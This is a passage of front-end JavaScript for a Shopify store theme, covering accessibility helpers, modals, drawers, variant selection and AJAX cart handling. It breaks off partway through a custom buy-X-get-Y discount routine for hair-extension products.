window.theme = window.theme || {};
window.slate = window.slate || {};

window.lazySizesConfig = window.lazySizesConfig || {};
lazySizesConfig.expFactor = 4;

(function($){
    var $ = jQuery = $;

    slate.utils = {
        /**
         * _.defaultTo from lodash
         * Checks `value` to determine whether a default value should be returned in
         * its place. The `defaultValue` is returned if `value` is `NaN`, `null`,
         * or `undefined`.
         * Source: https://github.com/lodash/lodash/blob/master/defaultTo.js
         *
         * @param {*} value - Value to check
         * @param {*} defaultValue - Default value
         * @returns {*} - Returns the resolved value
         */
        defaultTo: function(value, defaultValue) {
            return (value == null || value !== value) ? defaultValue : value
        }
    };

    slate.a11y = {

        /**
         * For use when focus shifts to a container rather than a link
         * eg for In-page links, after scroll, focus shifts to content area so that
         * next `tab` is where user expects if focusing a link, just $link.focus();
         *
         * @param {JQuery} $element - The element to be acted upon
         */
        pageLinkFocus: function($element) {
            var focusClass = 'js-focus-hidden';

            $element.first()
                .attr('tabIndex', '-1')
                .focus()
                .addClass(focusClass)
                .one('blur', callback);

            function callback() {
                $element.first()
                    .removeClass(focusClass)
                    .removeAttr('tabindex');
            }
        },

        /**
         * If there's a hash in the url, focus the appropriate element
         */
        focusHash: function() {
            var hash = window.location.hash;

            // is there a hash in the url? is it an element on the page?
            if (hash && document.getElementById(hash.slice(1))) {
                this.pageLinkFocus(jQuery(hash));
            }
        },

        /**
         * When an in-page (url w/hash) link is clicked, focus the appropriate element
         */
        bindInPageLinks: function() {
            jQuery('a[href*=#]').on('click', function(evt) {
                this.pageLinkFocus(jQuery(evt.currentTarget.hash));
            }.bind(this));
        },

        /**
         * Traps the focus in a particular container
         *
         * @param {object} options - Options to be used
         * @param {jQuery} options.$container - Container to trap focus within
         * @param {jQuery} options.$elementToFocus - Element to be focused when focus leaves container
         * @param {string} options.namespace - Namespace used for new focus event handler
         */
        trapFocus: function(options) {
            var eventName = options.namespace
                ? 'focusin.' + options.namespace
                : 'focusin';

            if (!options.$elementToFocus) {
                options.$elementToFocus = options.$container;
            }

            options.$container.attr('tabindex', '-1');
            options.$elementToFocus.focus();

            jQuery(document).off('focusin');

            jQuery(document).on(eventName, function(evt) {
                if (options.$container[0] !== evt.target && !options.$container.has(evt.target).length) {
                    options.$container.focus();
                }
            });
        },

        /**
         * Removes the trap of focus in a particular container
         *
         * @param {object} options - Options to be used
         * @param {jQuery} options.$container - Container to trap focus within
         * @param {string} options.namespace - Namespace used for new focus event handler
         */
        removeTrapFocus: function(options) {
            var eventName = options.namespace
                ? 'focusin.' + options.namespace
                : 'focusin';

            if (options.$container && options.$container.length) {
                options.$container.removeAttr('tabindex');
            }

            jQuery(document).off(eventName);
        },


        // Not from Slate, but fit in the a11y category
        lockMobileScrolling: function(namespace, $element) {
            if ($element) {
                var $el = $element;
            } else {
                var $el = jQuery(document.documentElement).add('body');
            }
            $el.on('touchmove' + namespace, function () {
                return false;
            });
        },

        unlockMobileScrolling: function(namespace, $element) {
            if ($element) {
                var $el = $element;
            } else {
                var $el = jQuery(document.documentElement).add('body');
            }
            $el.off(namespace);
        }
    };

    theme.Sections = function Sections() {
        this.constructors = {};
        this.instances = [];

        jQuery(document)
            .on('shopify:section:load', this._onSectionLoad.bind(this))
            .on('shopify:section:unload', this._onSectionUnload.bind(this))
            .on('shopify:section:select', this._onSelect.bind(this))
            .on('shopify:section:deselect', this._onDeselect.bind(this))
            .on('shopify:block:select', this._onBlockSelect.bind(this))
            .on('shopify:block:deselect', this._onBlockDeselect.bind(this));
    };

    theme.Sections.prototype = $.extend({}, theme.Sections.prototype, {
        createInstance: function(container, constructor) {
            var $container = jQuery(container);
            var id = $container.attr('data-section-id');
            var type = $container.attr('data-section-type');

            constructor = constructor || this.constructors[type];

            if (typeof constructor === 'undefined') {
                return;
            }

            var instance = $.extend(new constructor(container), {
                id: id,
                type: type,
                container: container
            });

            this.instances.push(instance);
        },

        _onSectionLoad: function(evt, subSection, subSectionId) {
            if (AOS) {
                AOS.refreshHard();
            }
            var container = subSection ? subSection : jQuery('[data-section-id]', evt.target)[0];

            if (!container) {
                return;
            }

            this.createInstance(container);

            var instance = subSection ? subSectionId : this._findInstance(evt.detail.sectionId);

            if (!subSection) {
                this._loadSubSections();
            }

            // Run JS only in case of the section being selected in the editor
            // before merchant clicks "Add"
            if (instance && typeof instance.onLoad === 'function') {
                instance.onLoad(evt);
            }
        },

        _loadSubSections: function() {
            if (AOS) {
                AOS.refreshHard();
            }
            jQuery('[data-subsection]').each(function(evt, el) {
                this._onSectionLoad(null, el, jQuery(el).data('section-d'));
            }.bind(this));
        },

        _onSectionUnload: function(evt) {
            var instance = this._removeInstance(evt.detail.sectionId);
            if (instance && typeof instance.onUnload === 'function') {
                instance.onUnload(evt);
            }
        },

        _onSelect: function(evt) {
            var instance = this._findInstance(evt.detail.sectionId);

            if (instance && typeof instance.onSelect === 'function') {
                instance.onSelect(evt);
            }
        },

        _onDeselect: function(evt) {
            var instance = this._findInstance(evt.detail.sectionId);

            if (instance && typeof instance.onDeselect === 'function') {
                instance.onDeselect(evt);
            }
        },

        _onBlockSelect: function(evt) {
            var instance = this._findInstance(evt.detail.sectionId);

            if (instance && typeof instance.onBlockSelect === 'function') {
                instance.onBlockSelect(evt);
            }
        },

        _onBlockDeselect: function(evt) {
            var instance = this._findInstance(evt.detail.sectionId);

            if (instance && typeof instance.onBlockDeselect === 'function') {
                instance.onBlockDeselect(evt);
            }
        },

        _findInstance: function(id) {
            for (var i = 0; i < this.instances.length; i++) {
                if (this.instances[i].id === id) {
                    return this.instances[i];
                }
            }
        },

        _removeInstance: function(id) {
            var i = this.instances.length;
            var instance;

            while(i--) {
                if (this.instances[i].id === id) {
                    instance = this.instances[i];
                    this.instances.splice(i, 1);
                    break;
                }
            }

            return instance;
        },

        register: function(type, constructor) {
            this.constructors[type] = constructor;
            var $sections = jQuery('[data-section-type=' + type + ']');

            $sections.each(function(index, container) {
                this.createInstance(container, constructor);
            }.bind(this));
        }
    });


    /**
     * Currency Helpers
     * -----------------------------------------------------------------------------
     * A collection of useful functions that help with currency formatting
     *
     * Current contents
     * - formatMoney - Takes an amount in cents and returns it as a formatted dollar value.
     *
     * Alternatives
     * - Accounting.js - http://openexchangerates.github.io/accounting.js/
     *
     */

    theme.Currency = (function() {
        var moneyFormat = '$';

        function formatMoney(cents, format) {
            if (typeof cents === 'string') {
                cents = cents.replace('.', '');
            }
            var value = '';
            var placeholderRegex = /\{\{\s*(\w+)\s*\}\}/;
            var formatString = (format || moneyFormat);

            function formatWithDelimiters(number, precision, thousands, decimal) {
                precision = slate.utils.defaultTo(precision, 2);
                thousands = slate.utils.defaultTo(thousands, ',');
                decimal = slate.utils.defaultTo(decimal, '.');

                if (isNaN(number) || number == null) {
                    return 0;
                }

                number = (number / 100.0).toFixed(precision);

                var parts = number.split('.');
                var dollarsAmount = parts[0].replace(/(\d)(?=(\d\d\d)+(?!\d))/g, '$1' + thousands);
                var centsAmount = parts[1] ? (decimal + parts[1]) : '';

                return dollarsAmount + centsAmount;
            }

            switch (formatString.match(placeholderRegex)[1]) {
                case 'amount':
                    value = formatWithDelimiters(cents, 2);
                    break;
                case 'amount_no_decimals':
                    value = formatWithDelimiters(cents, 0);
                    break;
                case 'amount_with_comma_separator':
                    value = formatWithDelimiters(cents, 2, '.', ',');
                    break;
                case 'amount_no_decimals_with_comma_separator':
                    value = formatWithDelimiters(cents, 0, '.', ',');
                    break;
                case 'amount_no_decimals_with_space_separator':
                    value = formatWithDelimiters(cents, 0, ' ');
                    break;
            }

            return formatString.replace(placeholderRegex, value);
        }

        return {
            formatMoney: formatMoney
        }
    })();


    /**
     * Image Helper Functions
     * -----------------------------------------------------------------------------
     * A collection of functions that help with basic image operations.
     *
     */

    theme.Images = (function() {

        /**
         * Find the Shopify image attribute size
         *
         * @param {string} src
         * @returns {null}
         */
        function imageSize(src) {
            if (!src) {
                return '620x'; // default based on theme
            }

            var match = src.match(/.+_((?:pico|icon|thumb|small|compact|medium|large|grande)|\d{1,4}x\d{0,4}|x\d{1,4})[_\.@]/);

            if (match !== null) {
                return match[1];
            } else {
                return null;
            }
        }

        /**
         * Adds a Shopify size attribute to a URL
         *
         * @param src
         * @param size
         * @returns {*}
         */
        function getSizedImageUrl(src, size) {
            if (size == null) {
                return src;
            }

            if (size === 'master') {
                return this.removeProtocol(src);
            }

            var match = src.match(/\.(jpg|jpeg|gif|png|bmp|bitmap|tiff|tif)(\?v=\d+)?$/i);

            if (match != null) {
                var prefix = src.split(match[0]);
                var suffix = match[0];

                return this.removeProtocol(prefix[0] + '_' + size + suffix);
            }

            return null;
        }

        function removeProtocol(path) {
            return path.replace(/http(s)?:/, '');
        }

        return {
            imageSize: imageSize,
            getSizedImageUrl: getSizedImageUrl,
            removeProtocol: removeProtocol
        };
    })();

    slate.Variants = (function() {

        function Variants(options) {
            this.$container = options.$container;
            this.product = options.product;
            this.singleOptionSelector = options.singleOptionSelector;
            this.originalSelectorId = options.originalSelectorId;
            this.enableHistoryState = options.enableHistoryState;
            this.currentVariant = this._getVariantFromOptions();

            jQuery(this.singleOptionSelector, this.$container).on('change', this._onSelectChange.bind(this));
        }

        Variants.prototype = $.extend({}, Variants.prototype, {

            _getCurrentOptions: function() {
                var currentOptions = $.map(jQuery(this.singleOptionSelector, this.$container), function(element) {
                    var $element = jQuery(element);
                    var type = $element.attr('type');
                    var currentOption = {};

                    if (type === 'radio' || type === 'checkbox') {
                        if ($element[0].checked) {
                            currentOption.value = $element.val();
                            currentOption.index = $element.data('index');

                            return currentOption;
                        } else {
                            return false;
                        }
                    } else {
                        currentOption.value = $element.val();
                        currentOption.index = $element.data('index');

                        return currentOption;
                    }
                });

                // remove any unchecked input values if using radio buttons or checkboxes
                currentOptions = this._compact(currentOptions);

                return currentOptions;
            },

            _getVariantFromOptions: function() {
                var selectedValues = this._getCurrentOptions();
                var variants = this.product.variants;
                var found = false;

                variants.forEach(function(variant) {
                    var match = true;
                    var options = variant.options;

                    selectedValues.forEach(function(option) {
                        // console.log('try to match ' + option.value + ' with ' + variant[option.index]);

                        if (match) {
                            match = (variant[option.index] === option.value);
                        }
                    });

                    if (match) {
                        found = variant;
                    }
                });

                return found || null;
            },

            _onSelectChange: function() {
                var variant = this._getVariantFromOptions();

                this.$container.trigger({
                    type: 'variantChange',
                    variant: variant
                });

                if (!variant) {
                    return;
                }

                this._updateMasterSelect(variant);
                this._updateImages(variant);
                this._updatePrice(variant);
                this._updateSKU(variant);
                this.currentVariant = variant;

                if (this.enableHistoryState) {
                    this._updateHistoryState(variant);
                }
            },

            _updateImages: function(variant) {
                var variantImage = variant.featured_image || {};
                var currentVariantImage = this.currentVariant.featured_image || {};

                if (!variant.featured_image || variantImage.src === currentVariantImage.src) {
                    return;
                }

                this.$container.trigger({
                    type: 'variantImageChange',
                    variant: variant
                });
            },

            _updatePrice: function(variant) {
                if (variant.price === this.currentVariant.price && variant.compare_at_price === this.currentVariant.compare_at_price) {
                    return;
                }

                this.$container.trigger({
                    type: 'variantPriceChange',
                    variant: variant
                });
            },

            _updateSKU: function(variant) {
                if (variant.sku === this.currentVariant.sku) {
                    return;
                }

                this.$container.trigger({
                    type: 'variantSKUChange',
                    variant: variant
                });
            },

            _updateHistoryState: function(variant) {
                if (!history.replaceState || !variant) {
                    return;
                }

                var newurl = window.location.protocol + '//' + window.location.host + window.location.pathname + '?variant=' + variant.id;
                window.history.replaceState({path: newurl}, '', newurl);
            },

            _updateMasterSelect: function(variant) {
                jQuery(this.originalSelectorId, this.$container).val(variant.id);
            },

            // _.compact from lodash
            // https://github.com/lodash/lodash/blob/4d4e452ade1e78c7eb890968d851f837be37e429/compact.js
            _compact: function(array) {
                var index = -1,
                    length = array == null ? 0 : array.length,
                    resIndex = 0,
                    result = [];

                while (++index < length) {
                    var value = array[index];
                    if (value) {
                        result[resIndex++] = value;
                    }
                }
                return result;
            }
        });

        return Variants;
    })();


    /**
     * iFrames
     * -----------------------------------------------------------------------------
     * Wrap videos in div to force responsive layout.
     *
     * @namespace iframes
     */

    slate.rte = {
        wrapTable: function() {
            jQuery('.rte table').wrap('<div class="table-wrapper"></div>');
        },

        wrapVideo: function() {
            var $iframeVideo = jQuery('.rte iframe[src*="youtube.com/embed"], .rte iframe[src*="player.vimeo"]');
            var $iframeReset = $iframeVideo.add('iframe#admin_bar_iframe');

            $iframeVideo.each(function () {
                // Add wrapper to make video responsive
                if (!jQuery(this).parents('.video-wrapper').length) {
                    jQuery(this).wrap('<div class="video-wrapper"></div>');
                }
            });

            $iframeReset.each(function () {
                // Re-set the src attribute on each iframe after page load
                // for Chrome's "incorrect iFrame content on 'back'" bug.
                // https://code.google.com/p/chromium/issues/detail?id=395791
                // Need to specifically target video and admin bar
                this.src = this.src;
            });
        }
    };


    theme.Modals = (function() {
        function Modal(id, name, options) {
            var defaults = {
                close: '.js-modal-close',
                open: '.js-modal-open-' + name,
                openClass: 'modal--is-active',
                closingClass: 'modal--is-closing',
                bodyOpenClass: 'modal-open',
                bodyOpenSolidClass: 'modal-open--solid',
                bodyClosingClass: 'modal-closing',
                closeOffContentClick: true
            };

            this.id = id;
            this.$modal = jQuery('#' + id);

            if (!this.$modal.length) {
                return false;
            }

            this.nodes = {
                $parent: jQuery('html').add('body'),
                $modalContent: this.$modal.find('.modal__inner')
            };

            this.config = $.extend(defaults, options);
            this.modalIsOpen = false;
            this.$focusOnOpen = this.config.focusOnOpen ? jQuery(this.config.focusOnOpen) : this.$modal;
            this.isSolid = this.config.solid;

            this.init();
        }

        Modal.prototype.init = function() {
            var $openBtn = jQuery(this.config.open);

            // Add aria controls
            $openBtn.attr('aria-expanded', 'false');

            jQuery(this.config.open).on('click', this.open.bind(this));
            this.$modal.find(this.config.close).on('click', this.close.bind(this));

            // Close modal if a drawer is opened
            jQuery('body').on('drawerOpen', function() {
                this.close();
            }.bind(this));
        };

        Modal.prototype.open = function(evt) {
            // Keep track if modal was opened from a click, or called by another function
            var externalCall = false;

            // don't open an opened modal
            if (this.modalIsOpen) {
                return;
            }

            // Prevent following href if link is clicked
            if (evt) {
                evt.preventDefault();
            } else {
                externalCall = true;
            }

            // Without this, the modal opens, the click event bubbles up to $nodes.page
            // which closes the modal.
            if (evt && evt.stopPropagation) {
                evt.stopPropagation();
                // save the source of the click, we'll focus to this on close
                this.$activeSource = jQuery(evt.currentTarget);
            }

            if (this.modalIsOpen && !externalCall) {
                this.close();
            }

            this.$modal
                .prepareTransition()
                .addClass(this.config.openClass);
            this.nodes.$parent.addClass(this.config.bodyOpenClass);

            if (this.isSolid) {
                this.nodes.$parent.addClass(this.config.bodyOpenSolidClass);
            }

            this.modalIsOpen = true;

            slate.a11y.trapFocus({
                $container: this.$modal,
                $elementToFocus: this.$focusOnOpen,
                namespace: 'modal_focus'
            });

            if (this.$activeSource && this.$activeSource.attr('aria-expanded')) {
                this.$activeSource.attr('aria-expanded', 'true');
            }

            jQuery('body').trigger('modalOpen.' + this.id);

            this.bindEvents();
        };

        Modal.prototype.close = function() {
            // don't close a closed modal
            if (!this.modalIsOpen) {
                return;
            }

            // deselect any focused form elements
            jQuery(document.activeElement).trigger('blur');

            this.$modal
                .prepareTransition()
                .removeClass(this.config.openClass)
                .addClass(this.config.closingClass);
            this.nodes.$parent.removeClass(this.config.bodyOpenClass);
            this.nodes.$parent.addClass(this.config.bodyClosingClass);
            var o = this;
            window.setTimeout(function() {
                o.nodes.$parent.removeClass(o.config.bodyClosingClass);
                o.$modal.removeClass(o.config.closingClass);
            }, 500); // modal close css transition

            if (this.isSolid) {
                this.nodes.$parent.removeClass(this.config.bodyOpenSolidClass);
            }

            this.modalIsOpen = false;

            slate.a11y.removeTrapFocus({
                $container: this.$modal,
                namespace: 'modal_focus'
            });

            if (this.$activeSource && this.$activeSource.attr('aria-expanded')) {
                this.$activeSource.attr('aria-expanded', 'false').focus();
            }

            jQuery('body').trigger('modalClose.' + this.id);

            this.unbindEvents();
        };

        Modal.prototype.bindEvents = function() {
            // Pressing escape closes modal
            this.nodes.$parent.on('keyup.modal', function(evt) {
                if (evt.keyCode === 27) {
                    this.close();
                }
            }.bind(this));

            if (this.config.closeOffContentClick) {
                // Clicking outside of the modal content also closes it
                this.$modal.on('click.modal', this.close.bind(this));

                // Exception to above: clicking anywhere on the modal content will NOT close it
                this.nodes.$modalContent.on('click.modal', function(evt) {
                    evt.stopImmediatePropagation();
                });
            }
        };

        Modal.prototype.unbindEvents = function() {
            this.nodes.$parent.off('.modal');

            if (this.config.closeOffContentClick) {
                this.$modal.off('.modal');
                this.nodes.$modalContent.off('.modal');
            }
        };

        return Modal;
    })();

    theme.Drawers = (function() {
        function Drawer(id, name, ignoreScrollLock) {
            this.config = {
                id: id,
                close: '.js-drawer-close',
                open: '.js-drawer-open-' + name,
                openClass: 'js-drawer-open',
                closingClass: 'js-drawer-closing',
                activeDrawer: 'drawer--is-open',
                namespace: '.drawer-' + name
            };

            this.$nodes = {
                parent: jQuery(document.documentElement).add('body'),
                page: jQuery('#MainContent')
            };

            this.$drawer = jQuery('#' + id);

            if (!this.$drawer.length) {
                return false;
            }

            this.isOpen = false;
            this.ignoreScrollLock = ignoreScrollLock;
            this.init();
        };

        Drawer.prototype = $.extend({}, Drawer.prototype, {
            init: function() {
                var $openBtn = jQuery(this.config.open);

                // Add aria controls
                $openBtn.attr('aria-expanded', 'false');

                $openBtn.on('click', this.open.bind(this));
                this.$drawer.find(this.config.close).on('click', this.close.bind(this));
            },

            open: function(evt) {
                if (evt) {
                    evt.preventDefault();
                }

                if (this.isOpen) {
                    return;
                }

                // Without this the drawer opens, the click event bubbles up to $nodes.page which closes the drawer.
                if (evt && evt.stopPropagation) {
                    evt.stopPropagation();
                    // save the source of the click, we'll focus to this on close
                    this.$activeSource = jQuery(evt.currentTarget);
                }

                this.$drawer.prepareTransition().addClass(this.config.activeDrawer);

                this.$nodes.parent.addClass(this.config.openClass);
                this.isOpen = true;

                slate.a11y.trapFocus({
                    $container: this.$drawer,
                    namespace: 'drawer_focus'
                });

                jQuery('body').trigger('drawerOpen.' + this.config.id);

                if (this.$activeSource && this.$activeSource.attr('aria-expanded')) {
                    this.$activeSource.attr('aria-expanded', 'true');
                }

                this.bindEvents();
            },

            close: function() {
                if (!this.isOpen) {
                    return;
                }

                // deselect any focused form elements
                jQuery(document.activeElement).trigger('blur');

                this.$drawer.prepareTransition().removeClass(this.config.activeDrawer);

                this.$nodes.parent.removeClass(this.config.openClass);
                this.$nodes.parent.addClass(this.config.closingClass);
                var o = this;
                window.setTimeout(function() {
                    o.$nodes.parent.removeClass(o.config.closingClass);
                }, 500);

                this.isOpen = false;

                slate.a11y.removeTrapFocus({
                    $container: this.$drawer,
                    namespace: 'drawer_focus'
                });

                if (this.$activeSource && this.$activeSource.attr('aria-expanded')) {
                    this.$activeSource.attr('aria-expanded', 'false');
                }

                this.unbindEvents();
            },

            bindEvents: function() {
                if (!this.ignoreScrollLock) {
                    slate.a11y.lockMobileScrolling(this.config.namespace, this.$nodes.page);
                }

                // Clicking out of drawer closes it.
                // Check to see if clicked on element in drawer
                // because of any drawer built witin #MainContent
                this.$nodes.page.on('click' + this.config.namespace, function (evt) {
                    var $target = jQuery(evt.target);
                    var doNotClose = this.elementInsideDrawer($target);
                    if (!doNotClose) {
                        this.close();
                        return false;
                    }

                }.bind(this));

                // Pressing escape closes drawer
                this.$nodes.parent.on('keyup' + this.config.namespace, function(evt) {
                    if (evt.keyCode === 27) {
                        this.close();
                    }
                }.bind(this));
            },

            unbindEvents: function() {
                if (!this.ignoreScrollLock) {
                    slate.a11y.unlockMobileScrolling(this.config.namespace, this.$nodes.page);
                }
                this.$nodes.parent.off(this.config.namespace);
                this.$nodes.page.off(this.config.namespace);
            },

            // Check if clicked element is inside the drawer
            elementInsideDrawer: function($el) {
                return this.$drawer.find($el).length;
            }
        });

        return Drawer;
    })();

    theme.cart = {
        getCart: function() {
            return $.getJSON('/cart.js');
        },

        changeItem: function(key, qty) {
            return this._updateCart({
                type: 'POST',
                url: '/cart/change.js',
                data: 'quantity=' + qty + '&id=' + key,
                dataType: 'json'
            });
        },

        addItemFromForm: function(data) {
            return this._updateCart({
                type: 'POST',
                url: '/cart/add.js',
                data: data,
                dataType: 'json'
            });
        },

        _updateCart: function(params) {
            return $.ajax(params)
                .then(function(cart) {
                    return cart;
                }.bind(this))
        },

        updateNote: function(note) {
            var params = {
                type: 'POST',
                url: '/cart/update.js',
                data: 'note=' + theme.cart.attributeToString(note),
                dataType: 'json',
                success: function(cart) {},
                error: function(XMLHttpRequest, textStatus) {}
            };

            $.ajax(params);
        },

        attributeToString: function(attribute) {
            if ((typeof attribute) !== 'string') {
                attribute += '';
                if (attribute === 'undefined') {
                    attribute = '';
                }
            }
            return $.trim(attribute);
        }
    }

    jQuery(function() {
        // Add a loading indicator on the cart checkout button (/cart and drawer)
        jQuery('body').on('click', '.cart__checkout', function() {
            jQuery(this).addClass('btn--loading');
        });
        // Add a loading indicator on the cart checkout button (/cart and drawer)
        jQuery('body').on('click', '.cart__checkout.cart__checkout__to-register', function(e) {
            e.preventDefault();
            e.stopPropagation();
            window.location.href = '/account/register';
            return;
        });

        jQuery('body').on('change', 'textarea[name="note"]', function() {
            var newNote = jQuery(this).val();
            theme.cart.updateNote(newNote);
        });


        // Custom JS to prevent checkout without confirming terms and conditions
        jQuery('body').on('click', '.cart__checkout--ajax', function(evt) {
            if (jQuery('#CartAgree').is(':checked')) {
            } else {
                alert(theme.strings.cartTermsConfirmation);
                jQuery(this).removeClass('btn--loading');
                return false;
            }
        });

        jQuery('body').on('click', '.cart__checkout--page', function(evt) {
            if (jQuery('#CartPageAgree').is(':checked')) {
            } else {
                alert(theme.strings.cartTermsConfirmation);
                jQuery(this).removeClass('btn--loading');
                return false;
            }
        });
    });

    theme.QtySelector = (function() {
        var classes = {
            input: '.js-qty__num',
            plus: '.js-qty__adjust--plus',
            minus: '.js-qty__adjust--minus'
        };

        function QtySelector($el, options) {
            this.$wrapper = $el;
            this.$originalInput = $el.find('input[type="number"]');
            this.minValue = this.$originalInput.attr('min') || 1;

            var defaults = {
                namespace: null
            };

            this.options = $.extend(defaults, options);

            this.source = jQuery('#JsQty').html();
            this.template = Handlebars.compile(this.source);

            var quantities = {
                current: this._getOriginalQty(),
                add: this._getOriginalQty() + 1,
                minus: this._getOriginalQty() - 1
            };

            this.data = {
                key: this._getProductKey(),
                itemQty: quantities.current,
                itemAdd: quantities.add,
                itemMinus: quantities.minus,
                inputName: this._getInputName(),
                inputId: this._getId()
            }

            // Append new quantity selector then remove original
            this.$originalInput.after(this.template(this.data)).remove();
            this.$input = this.$wrapper.find(classes.input);
            this.$plus = this.$wrapper.find(classes.plus);
            this.$minus = this.$wrapper.find(classes.minus);

            this.initEventListeners();
        };

        QtySelector.prototype = $.extend({}, QtySelector.prototype, {
            _getProductKey: function() {
                return this.$originalInput.data('id') || null;
            },

            _getOriginalQty: function() {
                return parseInt(this.$originalInput.val());
            },

            _getInputName: function() {
                return this.$originalInput.attr('name');
            },

            _getId: function() {
                return this.$originalInput.attr('id');
            },

            initEventListeners: function() {
                this.$plus.on('click', function() {
                    var qty = this.validateQty(this.$input.val());
                    this.addQty(qty);
                }.bind(this));

                this.$minus.on('click', function() {
                    var qty = this.validateQty(this.$input.val());
                    this.subtractQty(qty);
                }.bind(this));

                this.$input.on('change', function() {
                    var qty = this.validateQty(this.$input.val());
                    this.changeQty(qty);
                }.bind(this));
            },

            addQty: function(number) {
                var qty = number + 1;
                this.changeQty(qty);
            },

            subtractQty: function(number) {
                var qty = number - 1;
                if (qty <= this.minValue) {
                    qty = this.minValue;
                }
                this.changeQty(qty);
            },

            changeQty: function(qty) {
                this.$input.val(qty);
                jQuery('body').trigger('qty' + this.options.namespace, [this.data.key, qty]);
            },

            validateQty: function(number) {
                if((parseFloat(number) == parseInt(number)) && !isNaN(number)) {
                    // We have a valid number!
                } else {
                    // Not a number. Default to 1.
                    number = 1;
                }
                return parseInt(number);
            }
        });

        return QtySelector;
    })();

    theme.CartDrawer = (function() {
        var config = {
            namespace: '.ajaxcart'
        };

        var selectors = {
            drawer: '#CartDrawer',
            container: '#CartContainer',
            template: '#CartTemplate',
            fixedFooter: '.drawer__footer--fixed',
            fixedInnerContent: '.drawer__inner--has-fixed-footer',
            cartBubble: '.cart-link__bubble'
        };

        function CartDrawer() {
            this.status = {
                loaded: false,
                loading: false
            };

            this.qtySelectors = [];

            this.drawer = new theme.Drawers('CartDrawer', 'cart');

            // Prep handlebars template
            var source = jQuery(selectors.template).html();
            this.template = Handlebars.compile(source);

            // Build cart on page load so it's ready in the drawer
            theme.cart.getCart().then(this.buildCart.bind(this));

            this.initEventListeners();
        };

        CartDrawer.prototype = $.extend({}, CartDrawer.prototype, {
            initEventListeners: function() {
                jQuery('body').on('updateCart' + config.namespace, this.initQtySelectors.bind(this));
                jQuery('body').on('updateCart' + config.namespace, this.sizeFooter.bind(this));
                jQuery('body').on('updateCart' + config.namespace, this.updateCartNotification.bind(this));
                jQuery('body').on('drawerOpen.CartDrawer', this.sizeFooter.bind(this));

                jQuery(window).on('resize' + config.namespace, $.debounce(150, this.sizeFooter.bind(this)));

                jQuery('body').on('added.ajaxProduct', function() {
                    theme.cart.getCart().then(function(cart) {
                        this.buildCart(cart, true, 'add');
                    }.bind(this));
                }.bind(this));
            },

            buildCart: function(cart, openDrawer, type = 'build') {
                this.loading(true);
                this.emptyCart();

                if (cart.item_count === 0) {
                    jQuery(selectors.container).append('<p class="appear-animation appear-delay-3"><svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-bag" viewBox="0 0 64 64"><g fill="none" stroke="#000" stroke-width="2"><path d="M25 26c0-15.79 3.57-20 8-20s8 4.21 8 20"></path><path d="M14.74 18h36.51l3.59 36.73h-43.7z"></path></g></svg><span>' + theme.strings.cartEmpty +'</span></p>');
                } else {

                    var items = [];
                    var item = {};
                    var data = {};
                    var animation_row = 1;

                    // ----------------------
                    // -------- START -------
                    // BUY X GET Y DISCOUNT - Made by SM
                    // ----------------------
                    // Removable products - which products to remove
                    var removable = [];
                    var addable = [];
                    var removable_free = [];
                    var cart_message_free = {};
                    var cart_message_paid = {};
                    var has_cart_message = false;
                    var has_course = false;

                    var free_tool_treshold = 60000;
//                     var free_tool_id = 6944976928918; // Change to false to disable
                    var free_tool_id = false; // Change to false to disable
                    var free_tool_variant_id = 40302603763862;
                    var has_free_tool = false;
                    var hair_accessories_total = 0;

                    var free_training_treshold = 120000;
                    var free_training_variant_id = 40314164871318;
                    var has_free_training = false;

                    var has_training = false;

                    // Free product count per 4 products
                    var free_product_count = 1;

                    // Max free tape tabs
                    var max_tape_tabs = 0;

                    // Total free tape tabs
                    var total_tape_tabs = 0;

                    // Product counts
                    var product_counts = {};
                    // I-tip 20
                    product_counts[2277212454971] = [];
                    product_counts[2277212454971]['total'] = 0;
                    product_counts[2277212454971]['paid'] = 0;
                    product_counts[2277212454971]['free'] = 0;
                    // I-tip 20 STRAIGHT
                    product_counts[6772685176982] = [];
                    product_counts[6772685176982]['total'] = 0;
                    product_counts[6772685176982]['paid'] = 0;
                    product_counts[6772685176982]['free'] = 0;
                    // I-tip 20 WAVY
                    product_counts[6772692385942] = [];
                    product_counts[6772692385942]['total'] = 0;
                    product_counts[6772692385942]['paid'] = 0;
                    product_counts[6772692385942]['free'] = 0;

                    // I-tip 24
                    product_counts[2278214533179] = [];
                    product_counts[2278214533179]['total'] = 0;
                    product_counts[2278214533179]['paid'] = 0;
                    product_counts[2278214533179]['free'] = 0;
                    // I-tip 24 STRAIGHT
                    product_counts[6772712964246] = [];
                    product_counts[6772712964246]['total'] = 0;
                    product_counts[6772712964246]['paid'] = 0;
                    product_counts[6772712964246]['free'] = 0;
                    // I-tip 24 WAVY
                    product_counts[6772719583382] = [];
                    product_counts[6772719583382]['total'] = 0;
                    product_counts[6772719583382]['paid'] = 0;
                    product_counts[6772719583382]['free'] = 0;

                    // Tape 20
                    product_counts[2280999747643] = [];
                    product_counts[2280999747643]['total'] = 0;
                    product_counts[2280999747643]['paid'] = 0;
                    product_counts[2280999747643]['free'] = 0;
                    // Tape 20 STRAIGHT
                    product_counts[6772894761110] = [];
                    product_counts[6772894761110]['total'] = 0;
                    product_counts[6772894761110]['paid'] = 0;
                    product_counts[6772894761110]['free'] = 0;
                    // Tape 20 WAVY
                    product_counts[6772900626582] = [];
                    product_counts[6772900626582]['total'] = 0;
                    product_counts[6772900626582]['paid'] = 0;
                    product_counts[6772900626582]['free'] = 0;

                    // K-tip 20 STRAIGHT
                    product_counts[6775689052310] = [];
                    product_counts[6775689052310]['total'] = 0;
                    product_counts[6775689052310]['paid'] = 0;
                    product_counts[6775689052310]['free'] = 0;
                    // K-tip 20 WAVY
                    product_counts[6775739121814] = [];
                    product_counts[6775739121814]['total'] = 0;
                    product_counts[6775739121814]['paid'] = 0;
                    product_counts[6775739121814]['free'] = 0;

                    // Weft 20 STRAIGHT
                    product_counts[6775789093014] = [];
                    product_counts[6775789093014]['total'] = 0;
                    product_counts[6775789093014]['paid'] = 0;
                    product_counts[6775789093014]['free'] = 0;
                    // Weft 20 WAVY
                    product_counts[6775816650902] = [];
                    product_counts[6775816650902]['total'] = 0;
                    product_counts[6775816650902]['paid'] = 0;
                    product_counts[6775816650902]['free'] = 0;

                    // Weft 24 STRAIGHT
                    product_counts[6775828086934] = [];
                    product_counts[6775828086934]['total'] = 0;
                    product_counts[6775828086934]['paid'] = 0;
                    product_counts[6775828086934]['free'] = 0;
                    // Weft 24 WAVY
                    product_counts[6775843881110] = [];
                    product_counts[6775843881110]['total'] = 0;
                    product_counts[6775843881110]['paid'] = 0;
                    product_counts[6775843881110]['free'] = 0;

